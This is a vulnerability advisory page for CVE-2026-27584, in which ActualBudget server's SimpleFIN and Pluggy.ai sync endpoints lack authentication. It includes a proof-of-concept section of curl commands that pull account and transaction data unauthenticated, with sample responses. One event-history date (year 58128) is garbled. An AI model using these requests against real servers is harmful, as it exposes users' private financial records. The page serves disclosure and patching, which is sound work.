CVE-2026-27584: ActualBudget server is Missing Authentication for SimpleFIN and Pluggy AI bank sync endpoints

Published Feb 24, 2026
·
Updated

Summary

Missing authentication middleware in the ActualBudget server component allows any unauthenticated user to query the SimpleFIN and Pluggy.ai integration endpoints and read sensitive bank account balance and transaction information.

Impact

This vulnerability allows an unauthenticated attacker to read the bank account balance and transaction history of ActualBudget users. This vulnerability impacts all ActualBudget Server users with the SimpleFIN or Pluggy.ai integrations configured. The ActualBudget Server instance must be reachable over the network.

Details

The ActualBudget server component allows for integration with SimpleFIN and Pluggy.ai services. These services read bank account balances and transaction data from users' banks and return the data to ActualBudget. The affected endpoints facilitate this integration and are intended to be used only by logged in users for the purposes of syncing bank transaction data.

The vulnerable source code is in the following files in the actualbudget/actual GitHub repository (https://github.com/actualbudget/actual/): /packages/sync-server/src/app-simplefin/app-simplefin.js /packages/sync-server/src/app-pluggyai/app-pluggyai.js

The sensitive endpoints missing authentication are: POST /simplefin/status POST /simplefin/accounts POST /simplefin/transactions POST /pluggyai/status POST /pluggyai/accounts POST /pluggyai/transactions

The following source code is an example of an integration that implements the authentication middleware (packages/sync-server/src/app-gocardless/app-gocardless.js): js const app = express(); app.use(requestLoggerMiddleware); ... app.use(express.json()); app.use(validateSessionMiddleware); // <-- Uses authentication

PoC

The below commands exploit this vulnerability on both the SimpleFIN and Pluggy.ai endpoints. No authentication is required. Network access is required.

SimpleFIN: bash Check if SimpleFIN is configured curl -X POST "https://<actualbudgethost>/simplefin/status"

List SimpleFIN accounts curl -X POST "https://<actualbudgethost>/simplefin/accounts"

List SimpleFIN transactions with an account ID from the previous request curl -X POST "https://<actualbudgethost>/simplefin/transactions" -H "Content-Type: application/json" -d '{"accountId":["ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX"],"startDate":["2026-02-01"]}'

PluggyAI: bash Check if PluggyAI is configured curl -X POST "https://<actualbudgethost>/pluggyai/status"

List Pluggy.ai accounts curl -X POST "https://<actualbudgethost>/pluggyai/accounts"

List Pluggy.ai transactions with an account ID from the previous request curl -X POST "https://<actualbudgethost>/pluggyai/transactions" -H "Content-Type: application/json" -d '{"accountId":["ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX"],"startDate":["2026-02-01"]}'

Example response from POST /simplefin/accounts: json { "status": "ok", "data": { "accounts": [ { "id": "ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", "name": "CHEQUING ACCOUNT", "currency": "CAD", "balance": "1234.56", "available-balance": "0.00", "balance-date": 1771531758, "transactions": [], "holdings": [], "org": { "domain": "www.cibc.com", "name": "CIBC", "sfin-url": "https://beta-bridge.simplefin.org/simplefin", "url": "https://www.cibconline.cibc.com", "id": "www.cibconline.cibc.com" } }, ... ] } }

Example response from POST /simplefin/transactions: json { "status": "ok", "data": { "ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX": { "balances": [ { "balanceAmount": { "amount": "1234.56", "currency": "CAD" }, "balanceType": "expected", "referenceDate": "2026-02-19" }, { "balanceAmount": { "amount": "1234.56", "currency": "CAD" }, "balanceType": "interimAvailable", "referenceDate": "2026-02-19" } ], "startingBalance": 123456, "transactions": { "all": [ { "booked": true, "sortOrder": 1771502400, "date": "2026-02-19", "payeeName": "E-Transfer", "notes": "SEND E-TFR ABC", "transactionAmount": { "amount": "-12.00", "currency": "USD" }, "transactionId": "TRN-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", "transactedDate": "2026-02-19", "postedDate": "2026-02-19" }, ... ], "pending": [] } } } }

Other sources

Actual is a local-first personal finance tool. Prior to version 26.2.1, missing authentication middleware in the ActualBudget server component allows any unauthenticated user to query the SimpleFIN and Pluggy.ai integration endpoints and read sensitive bank account balance and transaction information. This vulnerability allows an unauthenticated attacker to read the bank account balance and transaction history of ActualBudget users. This vulnerability impacts all ActualBudget Server users with the SimpleFIN or Pluggy.ai integrations configured. The ActualBudget Server instance must be reachable over the network. Version 26.2.1 patches the issue.

— NVD

Affected Software

3 affected componentsFixes available
Actual ActualBudget Server<26.2.1
npm/@actual-app/sync-server<26.2.1
26.2.1
ActualBudget Actual Node.js<26.2.1

Event History

Feb 24, 2026
CVE Published
via MITRE·02:59 PM
Data Sourced
via MITRE·02:59 PM
DescriptionWeakness
Data Sourced
via NVD·03:21 PM
RemedyDescriptionSeverityWeaknessAffected Software
Advisory Published
via GitHub·08:13 PM
Data Sourced
via GitHub·08:13 PM
DescriptionWeaknessAffected Software
Oct 18, 58128
Event
via FIRST·04:32 AM

Frequently Asked Questions

1

What is the severity of CVE-2026-27584?

CVE-2026-27584 has been classified with a high severity due to potential unauthorized access to sensitive bank account data.

2

How can I fix CVE-2026-27584?

To remediate CVE-2026-27584, update to ActualBudget Server version 26.2.1 or higher which includes necessary authentication middleware.

3

What types of endpoints are affected by CVE-2026-27584?

CVE-2026-27584 affects the SimpleFIN and Pluggy AI bank sync endpoints of the ActualBudget server.

4

Who is impacted by CVE-2026-27584?

Any user utilizing the affected versions of ActualBudget Server may be impacted by CVE-2026-27584 due to missing authentication.

5

What is the nature of the vulnerability in CVE-2026-27584?

CVE-2026-27584 is a vulnerability that allows unauthenticated users to query sensitive integration endpoints, thereby compromising account security.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203